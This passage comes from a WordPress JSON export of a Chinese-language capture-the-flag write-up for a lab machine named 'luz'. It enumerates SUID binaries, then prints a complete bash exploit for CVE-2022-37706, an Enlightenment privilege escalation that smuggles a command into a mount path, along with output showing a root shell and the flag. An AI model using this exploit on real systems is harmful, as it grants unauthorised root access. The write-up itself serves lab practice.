2&gt;\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/x86_64-linux-gnu\/enlightenment\/utils\/enlightenment_ckpasswd\n\/usr\/lib\/x86_64-linux-gnu\/enlightenment\/utils\/enlightenment_system\n\/usr\/lib\/x86_64-linux-gnu\/enlightenment\/utils\/enlightenment_sys\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/bin\/pkexec\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/bsd-csh\n\/usr\/bin\/fusermount3\naelis@luz:~$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep\n\/usr\/bin\/mtr-packet cap_net_raw=ep\n\/usr\/bin\/ping cap_net_raw=ep<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u8fd9\u51e0\u4e2a\u7279\u6b8a\u7684<code>suid<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262258561.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262258561.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426224638440\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-shell\">#!\/bin\/bash\n\necho &quot;CVE-2022-37706&quot;\necho &quot;[*] Trying to find the vulnerable SUID file...&quot;\necho &quot;[*] This may take few seconds...&quot;\n\nfile=$(find \/ -name enlightenment_sys -perm -4000 2&gt;\/dev\/null | head -1)\nif [[ -z ${file} ]]\nthen\n    echo &quot;[-] Couldn&#039;t find the vulnerable SUID file...&quot;\n    echo &quot;[*] Enlightenment should be installed on your system.&quot;\n    exit 1\nfi\n\necho &quot;[+] Vulnerable SUID binary found!&quot;\necho &quot;[+] Trying to pop a root shell!&quot;\nmkdir -p \/tmp\/net\nmkdir -p &quot;\/dev\/..\/tmp\/;\/tmp\/exploit&quot;\n\necho &quot;\/bin\/sh&quot; &gt; \/tmp\/exploit\nchmod a+x \/tmp\/exploit\necho &quot;[+] Enjoy the root shell :)&quot;\n${file} \/bin\/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), &quot;\/dev\/..\/tmp\/;\/tmp\/exploit&quot; \/tmp\/\/\/net<\/code><\/pre>\n<pre><code class=\"language-bash\">aelis@luz:\/tmp$ vim pwn.sh\naelis@luz:\/tmp$ chmod +x pwn.sh \naelis@luz:\/tmp$ .\/pwn.sh \nCVE-2022-37706\n[*] Trying to find the vulnerable SUID file...\n[*] This may take few seconds...\n[+] Vulnerable SUID binary found!\n[+] Trying to pop a root shell!\n[+] Enjoy the root shell :)\nmount: \/dev\/..\/tmp\/: can&#039;t find in \/etc\/fstab.\n# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),1000(aelis)\n# cd \/root\n# ls -la\ntotal 40\ndrwx------  6 root root  4096 Apr 26 14:49 .\ndrwxr-xr-x 19 root root  4096 Jan 11  2023 ..\nlrwxrwxrwx  1 root root     9 Jan 11  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  3106 Oct 15  2021 .bashrc\ndrwxr-xr-x  3 root root  4096 Jan 11  2023 .local\n-rw-------  1 root root   520 Jan 11  2023 .mysql_history\n-rw-r--r--  1 root root   161 Jul  9  2019 .profile\ndrwx------  2 root aelis 4096 Apr 26 14:49 .run\ndrwx------  2 root root  4096 Jan 11  2023 .ssh\n-rw-------  1 root root    17 Jan 11  2023 root.txt\ndrwx------  3 root root  4096 Jan 11  2023 snap\n# cat root.txt\nHMV3nl1gth3nm3n7<\/code><\/pre>\n<p>\u83b7\u53d6flag\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>luz \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz] \u2514\u2500$ rustscan  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-639","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/639","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=639"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/639\/revisions"}],"predecessor-version":[{"id":640,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/639\/revisions\/640"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=639"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=639"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=639"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}